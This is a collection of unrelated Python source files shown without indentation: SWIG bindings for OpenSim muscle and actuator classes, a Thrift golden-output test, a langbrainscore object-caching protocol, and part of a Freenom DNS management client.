def setFiberCompressiveForceCosPennationCurve(self, aFiberCompressiveForceCosPennationCurve):
"""
setFiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceCosPennationCurve aFiberCompressiveForceCosPennationCurve)
Parameters
----------
aFiberCompressiveForceCosPennationCurve: OpenSim::FiberCompressiveForceCosPennationCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setFiberCompressiveForceCosPennationCurve(self, aFiberCompressiveForceCosPennationCurve)
def setMass(self, mass):
"""
setMass(Millard2012AccelerationMuscle self, double mass)
Parameters
----------
mass: double
"""
return _actuators.Millard2012AccelerationMuscle_setMass(self, mass)
def getDefaultActivation(self):
"""
getDefaultActivation(Millard2012AccelerationMuscle self) -> double
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getDefaultActivation(self)
def getDefaultFiberLength(self):
"""
getDefaultFiberLength(Millard2012AccelerationMuscle self) -> double
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getDefaultFiberLength(self)
def getDefaultFiberVelocity(self):
"""
getDefaultFiberVelocity(Millard2012AccelerationMuscle self) -> double
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getDefaultFiberVelocity(self)
def getActivationRate(self, s):
"""
getActivationRate(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_getActivationRate(self, s)
def getFiberVelocity(self, s):
"""
getFiberVelocity(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberVelocity(self, s)
def getFiberAcceleration(self, s):
"""
getFiberAcceleration(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberAcceleration(self, s)
def setDefaultActivation(self, activation):
"""
setDefaultActivation(Millard2012AccelerationMuscle self, double activation)
Parameters
----------
activation: double
"""
return _actuators.Millard2012AccelerationMuscle_setDefaultActivation(self, activation)
def setDefaultFiberLength(self, fiberLength):
"""
setDefaultFiberLength(Millard2012AccelerationMuscle self, double fiberLength)
Parameters
----------
fiberLength: double
"""
return _actuators.Millard2012AccelerationMuscle_setDefaultFiberLength(self, fiberLength)
def setDefaultFiberVelocity(self, fiberVelocity):
"""
setDefaultFiberVelocity(Millard2012AccelerationMuscle self, double fiberVelocity)
Parameters
----------
fiberVelocity: double
"""
return _actuators.Millard2012AccelerationMuscle_setDefaultFiberVelocity(self, fiberVelocity)
def setActivation(self, s, activation):
"""
setActivation(Millard2012AccelerationMuscle self, State s, double activation)
Parameters
----------
s: SimTK::State &
activation: double
"""
return _actuators.Millard2012AccelerationMuscle_setActivation(self, s, activation)
def setFiberLength(self, s, fiberLength):
"""
setFiberLength(Millard2012AccelerationMuscle self, State s, double fiberLength)
Parameters
----------
s: SimTK::State &
fiberLength: double
"""
return _actuators.Millard2012AccelerationMuscle_setFiberLength(self, s, fiberLength)
def setFiberVelocity(self, s, fiberVelocity):
"""
setFiberVelocity(Millard2012AccelerationMuscle self, State s, double fiberVelocity)
Parameters
----------
s: SimTK::State &
fiberVelocity: double
"""
return _actuators.Millard2012AccelerationMuscle_setFiberVelocity(self, s, fiberVelocity)
def computeActuation(self, s):
"""
computeActuation(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_computeActuation(self, s)
def computeInitialFiberEquilibrium(self, s):
"""
computeInitialFiberEquilibrium(Millard2012AccelerationMuscle self, State s)
Parameters
----------
s: SimTK::State &
"""
return _actuators.Millard2012AccelerationMuscle_computeInitialFiberEquilibrium(self, s)
def calcInextensibleTendonActiveFiberForce(self, s, aActivation):
"""
calcInextensibleTendonActiveFiberForce(Millard2012AccelerationMuscle self, State s, double aActivation) -> double
Parameters
----------
s: SimTK::State &
aActivation: double
"""
return _actuators.Millard2012AccelerationMuscle_calcInextensibleTendonActiveFiberForce(self, s, aActivation)
def calcActiveFiberForceAlongTendon(self, activation, fiberLength, fiberVelocity):
"""
calcActiveFiberForceAlongTendon(Millard2012AccelerationMuscle self, double activation, double fiberLength, double fiberVelocity) -> double
Parameters
----------
activation: double
fiberLength: double
fiberVelocity: double
"""
return _actuators.Millard2012AccelerationMuscle_calcActiveFiberForceAlongTendon(self, activation, fiberLength, fiberVelocity)
def extendPostScale(self, s, scaleSet):
"""
extendPostScale(Millard2012AccelerationMuscle self, State s, ScaleSet scaleSet)
Parameters
----------
s: SimTK::State const &
scaleSet: OpenSim::ScaleSet const &
"""
return _actuators.Millard2012AccelerationMuscle_extendPostScale(self, s, scaleSet)
__swig_destroy__ = _actuators.delete_Millard2012AccelerationMuscle
__del__ = lambda self: None
Millard2012AccelerationMuscle_swigregister = _actuators.Millard2012AccelerationMuscle_swigregister
Millard2012AccelerationMuscle_swigregister(Millard2012AccelerationMuscle)
def Millard2012AccelerationMuscle_safeDownCast(obj):
"""
Millard2012AccelerationMuscle_safeDownCast(OpenSimObject obj) -> Millard2012AccelerationMuscle
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.Millard2012AccelerationMuscle_safeDownCast(obj)
def Millard2012AccelerationMuscle_getClassName():
"""Millard2012AccelerationMuscle_getClassName() -> std::string const &"""
return _actuators.Millard2012AccelerationMuscle_getClassName()
class McKibbenActuator(opensim.simulation.PathActuator):
"""Proxy of C++ OpenSim::McKibbenActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.PathActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, McKibbenActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.PathActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, McKibbenActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> McKibbenActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.McKibbenActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(McKibbenActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.McKibbenActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.McKibbenActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(McKibbenActuator self) -> McKibbenActuator
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(McKibbenActuator self) -> std::string const &
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_getConcreteClassName(self)
def copyProperty_thread_length(self, source):
"""
copyProperty_thread_length(McKibbenActuator self, McKibbenActuator source)
Parameters
----------
source: OpenSim::McKibbenActuator::Self const &
"""
return _actuators.McKibbenActuator_copyProperty_thread_length(self, source)
def append_thread_length(self, value):
"""
append_thread_length(McKibbenActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_append_thread_length(self, value)
def constructProperty_thread_length(self, initValue):
"""
constructProperty_thread_length(McKibbenActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.McKibbenActuator_constructProperty_thread_length(self, initValue)
def get_thread_length(self, *args):
"""
get_thread_length(McKibbenActuator self, int i) -> double const
Parameters
----------
i: int
get_thread_length(McKibbenActuator self) -> double const &
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_get_thread_length(self, *args)
def upd_thread_length(self, *args):
"""
upd_thread_length(McKibbenActuator self, int i) -> double
Parameters
----------
i: int
upd_thread_length(McKibbenActuator self) -> double &
Parameters
----------
self: OpenSim::McKibbenActuator *
"""
return _actuators.McKibbenActuator_upd_thread_length(self, *args)
def set_thread_length(self, *args):
"""
set_thread_length(McKibbenActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_thread_length(McKibbenActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_set_thread_length(self, *args)
def copyProperty_number_of_turns(self, source):
"""
copyProperty_number_of_turns(McKibbenActuator self, McKibbenActuator source)
Parameters
----------
source: OpenSim::McKibbenActuator::Self const &
"""
return _actuators.McKibbenActuator_copyProperty_number_of_turns(self, source)
def append_number_of_turns(self, value):
"""
append_number_of_turns(McKibbenActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_append_number_of_turns(self, value)
def constructProperty_number_of_turns(self, initValue):
"""
constructProperty_number_of_turns(McKibbenActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.McKibbenActuator_constructProperty_number_of_turns(self, initValue)
def get_number_of_turns(self, *args):
"""
get_number_of_turns(McKibbenActuator self, int i) -> double const
Parameters
----------
i: int
get_number_of_turns(McKibbenActuator self) -> double const &
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_get_number_of_turns(self, *args)
def upd_number_of_turns(self, *args):
"""
upd_number_of_turns(McKibbenActuator self, int i) -> double
Parameters
----------
i: int
upd_number_of_turns(McKibbenActuator self) -> double &
Parameters
----------
self: OpenSim::McKibbenActuator *
"""
return _actuators.McKibbenActuator_upd_number_of_turns(self, *args)
def set_number_of_turns(self, *args):
"""
set_number_of_turns(McKibbenActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_number_of_turns(McKibbenActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_set_number_of_turns(self, *args)
def copyProperty_cord_length(self, source):
"""
copyProperty_cord_length(McKibbenActuator self, McKibbenActuator source)
Parameters
----------
source: OpenSim::McKibbenActuator::Self const &
"""
return _actuators.McKibbenActuator_copyProperty_cord_length(self, source)
def append_cord_length(self, value):
"""
append_cord_length(McKibbenActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_append_cord_length(self, value)
def constructProperty_cord_length(self, initValue):
"""
constructProperty_cord_length(McKibbenActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.McKibbenActuator_constructProperty_cord_length(self, initValue)
def get_cord_length(self, *args):
"""
get_cord_length(McKibbenActuator self, int i) -> double const
Parameters
----------
i: int
get_cord_length(McKibbenActuator self) -> double const &
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_get_cord_length(self, *args)
def upd_cord_length(self, *args):
"""
upd_cord_length(McKibbenActuator self, int i) -> double
Parameters
----------
i: int
upd_cord_length(McKibbenActuator self) -> double &
Parameters
----------
self: OpenSim::McKibbenActuator *
"""
return _actuators.McKibbenActuator_upd_cord_length(self, *args)
def set_cord_length(self, *args):
"""
set_cord_length(McKibbenActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_cord_length(McKibbenActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_set_cord_length(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::McKibbenActuator self) -> McKibbenActuator
__init__(OpenSim::McKibbenActuator self, std::string const & name, double num_turns, double thread_length) -> McKibbenActuator
Parameters
----------
name: std::string const &
num_turns: double
thread_length: double
"""
this = _actuators.new_McKibbenActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setNumberOfTurns(self, val):
"""
setNumberOfTurns(McKibbenActuator self, double val)
Parameters
----------
val: double
"""
return _actuators.McKibbenActuator_setNumberOfTurns(self, val)
def getNumberOfTurns(self):
"""
getNumberOfTurns(McKibbenActuator self) -> double
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_getNumberOfTurns(self)
def setThreadLength(self, val):
"""
setThreadLength(McKibbenActuator self, double val)
Parameters
----------
val: double
"""
return _actuators.McKibbenActuator_setThreadLength(self, val)
def getThreadLength(self):
"""
getThreadLength(McKibbenActuator self) -> double
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_getThreadLength(self)
def setCordLength(self, val):
"""
setCordLength(McKibbenActuator self, double val)
Parameters
----------
val: double
"""
return _actuators.McKibbenActuator_setCordLength(self, val)
def getCordLength(self):
"""
getCordLength(McKibbenActuator self) -> double
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_getCordLength(self)
def computeActuation(self, s):
"""
computeActuation(McKibbenActuator self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.McKibbenActuator_computeActuation(self, s)
__swig_destroy__ = _actuators.delete_McKibbenActuator
__del__ = lambda self: None
McKibbenActuator_swigregister = _actuators.McKibbenActuator_swigregister
McKibbenActuator_swigregister(McKibbenActuator)
def McKibbenActuator_safeDownCast(obj):
"""
McKibbenActuator_safeDownCast(OpenSimObject obj) -> McKibbenActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.McKibbenActuator_safeDownCast(obj)
def McKibbenActuator_getClassName():
"""McKibbenActuator_getClassName() -> std::string const &"""
return _actuators.McKibbenActuator_getClassName()
# This file is compatible with both classic and new-style classes.
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import difflib
import os
import shutil
import sys
import tempfile
import traceback
import unittest
from thrift.test.testset import generator
golden_root_dir = os.getenv("THRIFT_GOLDEN_DIR")
def read_file(path):
with open(path, "r") as f:
return f.read()
def gen_find_recursive_files(path):
for root, _, files in os.walk(path):
for f in files:
yield os.path.relpath(os.path.join(root, f), path)
class GoldenTest(unittest.TestCase):
MSG = """One or more testset outputs are out of sync with the generator.
To sync them, run:
thrift/test/testset/generator.py --install_dir ./thrift/test/testset/golden
"""
def compare_code(self, path1, path2):
gens = list(gen_find_recursive_files(path1))
fixt = list(gen_find_recursive_files(path2))
try:
# Compare that the generated files are the same
self.assertEqual(sorted(gens), sorted(fixt))
for gen in gens:
geng_path = os.path.join(path1, gen)
genf_path = os.path.join(path2, gen)
geng = read_file(geng_path)
genf = read_file(genf_path)
if geng == genf:
continue
msg = ["Difference found in " + gen + ":"]
for line in difflib.unified_diff(
geng.splitlines(),
genf.splitlines(),
geng_path,
genf_path,
lineterm="",
):
msg.append(line)
self.fail("\n".join(msg))
except Exception:
print(self.MSG, file=sys.stderr)
traceback.print_exc(file=sys.stderr)
raise
def setUp(self):
tmp = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmp, True)
self.tmp = tmp
self.maxDiff = None
def testGolden(self):
generator.generate(self.tmp)
# Compare generated to golden.
self.compare_code(golden_root_dir, self.tmp)
if __name__ == "__main__":
unittest.main()
|
import pickle
import typing
from abc import ABC, abstractclassmethod, abstractmethod
from numbers import Number
from pathlib import Path
import xarray as xr
import numpy as np
import yaml
from langbrainscore.utils.cache import get_cache_directory, pathify
from langbrainscore.utils.logging import log
T = typing.TypeVar("T")
@typing.runtime_checkable
class _Cacheable(typing.Protocol):
"""
A class used to define a common interface for Object caching in LangBrainscore
"""
def __eq__(o1: "_Cacheable", o2: "_Cacheable") -> bool:
def checkattr(key) -> bool:
"""helper function to check if an attribute is the same between two objects
and handles AttributeError while at it. if the attributes differ (or does
not exist on one or the other object), returns False.
"""
try:
if getattr(o1, key) != getattr(o2, key):
return False
except AttributeError:
return False
return True
for key, ob in vars(o1).items():
if isinstance(ob, (str, Number, bool, _Cacheable, tuple, type(None))):
if not checkattr(key):
log(f"{o1} and {o2} differ on {key}", cmap="ERR")
return False
elif isinstance(ob, xr.DataArray):
x1 = getattr(o1, key)
x2 = getattr(o2, key)
if (not np.allclose(x1.data, x2.data, equal_nan=True, atol=1e-4)) or (
x1.attrs != x2.attrs
):
log(f"{o1} and {o2} differ on {key}", cmap="ERR")
return False
else:
return True
# @abstractclassmethod
# @classmethod
def _get_xarray_objects(self) -> typing.Iterable[str]:
"""
returns the *names* of all attributes of self that are instances of xarray
NOTE: this method should be implemented by any subclass irrespective of instance
state so that in the future we can support loading from cache without having
to re-run the pipeline (and thereby assign attributes as appropriate)
by default, just goes over all the objects and returns their names if they are instances
of `xr.DataArray`
"""
keys = []
for key, ob in vars(self).items():
if isinstance(ob, xr.DataArray):
keys += [key]
return keys
def __repr__(self) -> str:
"""
default, broad implementation to support our use case.
constructs a string by concatenating all str, numeric, boolean
attributes of self, as well as all the representations of Cacheable
instances that are attributes of self.
"""
sep = "#"
rep = f"<{self.__class__.__name__}"
for key in sorted(vars(self)):
ob = getattr(self, key)
if isinstance(ob, (str, Number, bool, _Cacheable, tuple, type(None))):
# if isinstance(ob, (str, Number, bool, _Cacheable, tuple)):
if isinstance(ob, _Cacheable):
rep += f"{sep}{key}={ob.identifier_string}"
else:
rep += f"{sep}{key}={ob}"
return rep + ">"
@property
def identifier_string(self):
"""
This property aims to return an unambiguous representation of this _Cacheable
instance, complete with all scalar parameters used to initialize it, and any
_Cacheable instances that are attributes of this object.
Unless overridden, makes a call to `repr`
"""
return repr(self)
def to_cache(
self,
identifier_string: str = None,
overwrite=True,
cache_dir=None,
xarray_serialization_backend="to_zarr",
) -> Path:
"""
dump this object to cache. this method implementation will serve
as the default implementation. it is recommended that this be left
as-is for compatibility with caching across the library.
Args:
identifier_string (str): a unique identifier string to identify this cache
instance by (optional; by default, the .identifier_string property is used)
overwrite (bool): whether to overwrite existing cache by the same identity,
if it exists. if False, an exce
"""
if cache_dir:
cache = get_cache_directory(
cache_dir, calling_class=self.__class__.__name__
)
else:
cache = get_cache_directory(calling_class=self.__class__.__name__)
root, subdir = cache.root, cache.subdir
# now we use "subdir" to be our working directory to dump this cache object
subdir /= identifier_string or self.identifier_string
subdir.mkdir(parents=True, exist_ok=overwrite)
log(f"caching {self} to {subdir}")
with (subdir / "xarray_object_names.yml").open("w") as f:
yaml.dump(self._get_xarray_objects(), f, yaml.SafeDumper)
with (subdir / "id.txt").open("w") as f:
f.write(self.identifier_string)
kwargs = {}
if overwrite and "zarr" in xarray_serialization_backend:
kwargs.update({"mode": "w"})
for ob_name in self._get_xarray_objects():
ob = getattr(self, ob_name)
tgt_dir = subdir / (ob_name + ".xr")
dump_object_fn = getattr(
ob.to_dataset(name="data"), xarray_serialization_backend
)
dump_object_fn(tgt_dir, **kwargs)
cacheable_ptrs = {}
meta_attributes = {}
for key, ob in vars(self).items():
if isinstance(ob, _Cacheable):
dest = ob.to_cache(
identifier_string=identifier_string,
overwrite=overwrite,
xarray_serialization_backend=xarray_serialization_backend,
cache_dir=cache_dir,
)
cacheable_ptrs[key] = str(dest)
elif isinstance(ob, (str, Number, bool, _Cacheable, type(None))):
meta_attributes[key] = ob
with (subdir / "meta_attributes.yml").open("w") as f:
yaml.dump(meta_attributes, f, yaml.SafeDumper)
with (subdir / "cacheable_object_pointers.yml").open("w") as f:
yaml.dump(cacheable_ptrs, f, yaml.SafeDumper)
return subdir
def load_cache(
self,
identifier_string: str = None,
overwrite: bool = True,
xarray_deserialization_backend="open_zarr",
cache_dir=None,
) -> Path:
"""load attribute objects from cache onto the existing initialized object (self)"""
if cache_dir:
cache = get_cache_directory(
cache_dir, calling_class=self.__class__.__name__
)
else:
cache = get_cache_directory(calling_class=self.__class__.__name__)
root, subdir = cache.root, cache.subdir
# now we use "subdir" as our working directory to dump this cache object
subdir /= identifier_string or self.identifier_string
log(f"loading attributes of {self} from {subdir}")
with (subdir / "xarray_object_names.yml").open("r") as f:
self_xarray_objects = yaml.load(f, yaml.SafeLoader)
with (subdir / "id.txt").open("r") as f:
if (identifier_string or self.identifier_string) != (
cached_identifier_str := f.read()
):
if not overwrite:
raise ValueError(
f"mismatch in identifier string of self ({self.identifier_string}) and "
f"cached object ({cached_identifier_str}); overwriting is disabled."
)
else:
log(
f"mismatch in identifier string of self ({self.identifier_string}) and "
f"cached object ({cached_identifier_str}); overwriting anyway."
)
kwargs = {}
for ob_name in self_xarray_objects:
tgt_dir = subdir / (ob_name + ".xr")
load_object_fn = getattr(xr, xarray_deserialization_backend)
ob = load_object_fn(tgt_dir, **kwargs)
setattr(self, ob_name, ob.data)
with (subdir / "cacheable_object_pointers.yml").open("r") as f:
cacheable_ptrs: dict = yaml.load(f, yaml.SafeLoader)
# calls `load_cache` on all attributes that are also `_Cacheable` instances
# and thus implement the `load_cache` method
for key, ptr in cacheable_ptrs.items():
try:
ob = getattr(self, key)
ob.load_cache(
identifier_string=identifier_string,
overwrite=overwrite,
xarray_deserialization_backend=xarray_deserialization_backend,
cache_dir=cache_dir,
)
except AttributeError:
log(
f"`load_cache` currently only supports loading xarray objects or initialized `_Cacheable` objects"
)
with (subdir / "meta_attributes.yml").open("r") as f:
meta_attributes: dict = yaml.load(f, yaml.SafeLoader)
for key, ob in meta_attributes.items():
setattr(self, key, ob)
# NB comment from Guido: https://github.com/python/typing/issues/58#issuecomment-194569410
@classmethod
def from_cache(
cls: typing.Callable[..., T],
identifier_string: str,
xarray_deserialization_backend="open_zarr",
cache_dir=None,
) -> T:
"""
construct an object from cache. subclasses must start with the
object returned by a call to this method like so:
ob = super().from_cache(filename)
# further implementation, such as initializing
# member classes based on metadata
return ob
"""
Duck = type(cls.__name__, (cls,), {"__init__": (lambda _: None)})
duck = Duck()
duck.load_cache(
identifier_string,
overwrite=True,
xarray_deserialization_backend=xarray_deserialization_backend,
cache_dir=cache_dir,
)
return duck
|
# -*- coding: utf-8 -*-
"""
:author: Punk Lee
:datetime: 2020/4/21 22:02
:url: https://punk_lee.gitee.io/
:copyright: ©2020 Punk Lee <[email protected]>
"""
from sys import exit
from time import sleep
from random import random
from datetime import datetime
import os, stat, pickle, atexit
from retrying import retry
from requests.utils import cookiejar_from_dict
from requests import Session, ConnectTimeout, ReadTimeout, HTTPError
from . import url
from . import parse
from .utils import print_info, print_warn, get_public_ip, match_ip_address
RETRY_COUNT = 1
RETRY_TIMES = 0
def _retry_on_exception(e):
global RETRY_COUNT
_retry = isinstance(e, (ConnectTimeout, ReadTimeout, HTTPError))
if RETRY_COUNT > RETRY_TIMES:
print_warn(f'Retry Count > {RETRY_COUNT - 1} Times. Request Aborted.')
exit()
elif not _retry:
print_warn(e)
exit()
RETRY_COUNT += 1
print_warn('Retry + 1')
return _retry
RETRY_ARGS = {
'stop_max_attempt_number': 3,
'wait_random_min': 1000,
'wait_random_max': 6000,
'retry_on_exception': _retry_on_exception
}
REQUEST_LAYER_COUNT = 0
def request_handler(func):
def decorator(self, *args, **kwargs):
"""Request Handler"""
global RETRY_COUNT
global REQUEST_LAYER_COUNT
request_method = args[0]
request_url = args[1]
print_prefix = f'│{REQUEST_LAYER_COUNT * 3 * " " + "│" if REQUEST_LAYER_COUNT else ""}'
# {DEV}
if self.dev:
# print_dev(print_prefix, '↓') # {DEV}
print(f'{print_prefix}Method:{request_method}')
print(f'{print_prefix}URL:{request_url}')
print(f'{print_prefix}Form Data:{kwargs["data"]}') if request_method == 'POST' else None
print(print_prefix)
REQUEST_LAYER_COUNT += 1
"""Before the request"""
# Interval time
sleep(RETRY_COUNT * random())
"""CORE"""
resp = func(self, *args, **kwargs)
"""After the request"""
# {RESET} retry count
RETRY_COUNT = 1
# {SAVE} html file
self.response = resp
# {UPDATE} token
self.token = parse.token(resp)
# {CHECK} logged in
self.check_login_status(resp)
# {UPDATE} first get request
self.first_get_request = True if request_method == 'GET' else self.first_get_request
REQUEST_LAYER_COUNT = 0
return resp
return decorator
class Freenom(Session):
def __init__(self, username, password, root_path=None, headers=url.HEADERS, dev=False, retry_times=3):
"""
The Script for managing Freenom.com dns records.
:param username: your username
:param password: your password
:param root_path: cache file path of the program
:param headers: Freenom.com request headers
:param retry_times: retry times of per request
:param dev: debugging mode
"""
super(Freenom, self).__init__()
self.root_path = root_path if root_path else os.getcwd()
self.__locallydata_path = os.path.join(self.root_path, '.freenomdata')
self.__dev_path = os.path.join(self.root_path, 'dev')
self.dev = dev
self.first_get_request = False
global RETRY_TIMES
RETRY_TIMES = retry_times
self.username = username
self.password = password
self.get_locally_data()
self.__response = None
self.__pub_ip = None
self.__token = ''
# Save the file before the end of the program
atexit.register(self.save_locally_data)
self.headers = headers
self.cookies = self.locally_cookies
def get_locally_data(self):
try:
f = open(f'{self.__locallydata_path}', 'rb')
self.__locally_data = pickle.load(f)
f.close()
except Exception:
# create new freenom_dns cache data file
self.__locally_data = {
'cookies': cookiejar_from_dict({}),
'domains': []
}
self.save_locally_data()
return self.__locally_data
def save_locally_data(self):
f = open(f'{self.__locallydata_path}', 'wb')
# {CACHE} Cookies
self.__locally_data['cookies'] = self.cookies
pickle.dump(self.__locally_data, f)
f.close()
@property
def locally_cookies(self):
return self.__locally_data['cookies']
@locally_cookies.setter
def locally_cookies(self, cookies):
self.__locally_data['cookies'] = cookies
@property
def locally_domains(self):
if not self.__locally_data['domains']:
self.__locally_data['domains'] = self.domains()
return self.__locally_data['domains']
@locally_domains.setter
def locally_domains(self, domains):
self.__locally_data['domains'] = domains
def locally_records(self, domain):
try:
return self.__locally_data[domain]
except Exception:
self.__locally_data[domain] = self.records(domain)
return self.__locally_data[domain]
@property
def response(self):
return self.__response
@response.setter
def response(self, resp):
if self.dev:
html_text = resp.content.decode(parse.DECODE)
# create dev folder
if not os.path.exists(self.__dev_path):
os.mkdir(self.__dev_path)
os.chmod(self.__dev_path, stat.S_IRWXU | stat.S_IRGRP | stat.S_IRWXO)
filename = datetime.now().strftime("%H_%M_%S")
with open(f'{self.__dev_path}/{filename}.html', 'w', encoding='utf-8') as f:
f.write(f'<!-- {datetime.now().strftime("%Y-%m-%d %H:%M:%S")} -->\n')
f.write(f'<!-- {html_text if html_text else "This request has no response data available."} -->\n')
self.__response = resp
@property
def pub_ip(self):
if not self.__pub_ip:
self.__pub_ip = self.get_pub_ip()
return self.__pub_ip
@pub_ip.setter
def pub_ip(self, ip):
self.__pub_ip = ip
@property
def token(self):
if not self.__token and self.response:
self.__token = parse.token(self.response)
return self.__token
@token.setter
def token(self, data):
self.__token = data
def check_login_status(self, resp):
# wrong username or password
if resp.url.find('incorrect=true') != -1:
print_warn(parse.login_msg(resp))
exit()
# do login request
None if parse.loggedIn(resp) else self.do_login()
@request_handler
@retry(**RETRY_ARGS)
def request(self, *args, **kwargs):
return super(Freenom, self).request(timeout=RETRY_COUNT * 10, *args, **kwargs)
@retry(**RETRY_ARGS)
def get_pub_ip(self, pub_ip_url=''):
global RETRY_COUNT
pub_ip_url = pub_ip_url if pub_ip_url else url.PUB_IPS[RETRY_COUNT - 1]
self.pub_ip = get_public_ip(pub_ip_url, timeout=RETRY_COUNT * 10)
# {RESET} retry count
RETRY_COUNT = 1
return self.pub_ip
def do_login(self):
"""Do Login..."""
run = (True if input('Do you want to do login(y/n):').lower().count('y') else False) if self.dev else True
FORM_DATA = {
'token': self.token,
'username': self.username,
'password': self.password
}
# # clear old {COOKIES}
# self.cookies = cookiejar_from_dict({})
if run:
# Send a request to {LOGIN}.
self.post(url.DO_LOGIN, data=FORM_DATA)
# # {CACHE} new Cookies
# self.locally_cookies = self.cookies
def domains(self):
"""{Request} and {Update} and {Return} All Domain Data"""
self.get(url.DOMAINS)
# {CACHE} domains data
self.locally_domains = data = parse.domains_tbody_data(self.response)
return data
def show_domains(self):
"""Show All Domain"""
tbody = self.domains()
thead = parse.domains_thead_info(self.response)
if thead and tbody:
for domain in tbody:
print(f'{thead[0]} >>> {domain["domain"]}')
print(f'{thead[1]} >>> {domain["reg_date"]}')
print(f'{thead[2]} >>> {domain["exp_date"]}')
print(f'{thead[3]} >>> {domain["status"]}')
print(f'{thead[4]} >>> {domain["type"]}')
print_info('', num=32)
else:
print_info('NOTHING')
def __url_records(self, domain):
domains_data = self.locally_domains
domains = [i['domain'] for i in domains_data]
if not domain in domains:
print_warn('NO DATA FOUND FOR THIS DOMAIN')
exit()
domains_id = [i['id'] for i in domains_data]
domiansdns_data = dict(zip(domains, domains_id))
return url.RECORDS % (domain, domiansdns_data[domain])
def records(self, domain):
"""{Request} and {Return} All Record Data With Domain"""
self.get(self.__url_records(domain))
# {CACHE} domain records data
self.__locally_data[domain] = data = parse.records_tbody_data(self.response)
return data
def show_records(self, domain):
"""Show All Record"""
tbody = self.records(domain)
thead = parse.records_thead_info(self.response)
if thead and tbody:
for record in tbody:
print(f'{thead[0]} >>> {record["name"]}')
print(f'{thead[1]} >>> {record["type"]}')
print(f'{thead[2]} >>> {record["ttl"]}')
print(f'{thead[3]} >>> {record["target"]}')
print_info('', 32)
else:
print_info('NOTHING')
def __data_from_records(self, action, record_list):
FORM_DATA = {}
FORM_DATA['token'] = self.token
FORM_DATA['dnsaction'] = action
action_prefix = 'addrecord' if action == 'add' else 'records'
for i in range(len(record_list)):
FORM_DATA[action_prefix + f'[{i}][name]'] = record_list[i]['name']
FORM_DATA[action_prefix + f'[{i}][type]'] = record_list[i]['type']
FORM_DATA[action_prefix + f'[{i}][ttl]'] = record_list[i]['ttl']
FORM_DATA[action_prefix + f'[{i}][value]'] = record_list[i]['target']
return FORM_DATA
def __request_record(self, domain, action, record_list):
request_url = self.__url_records(domain)
# {Request} GET first
if not self.first_get_request: self.get(request_url)
# {Request} POST
self.post(request_url, data=self.__data_from_records(action, record_list))
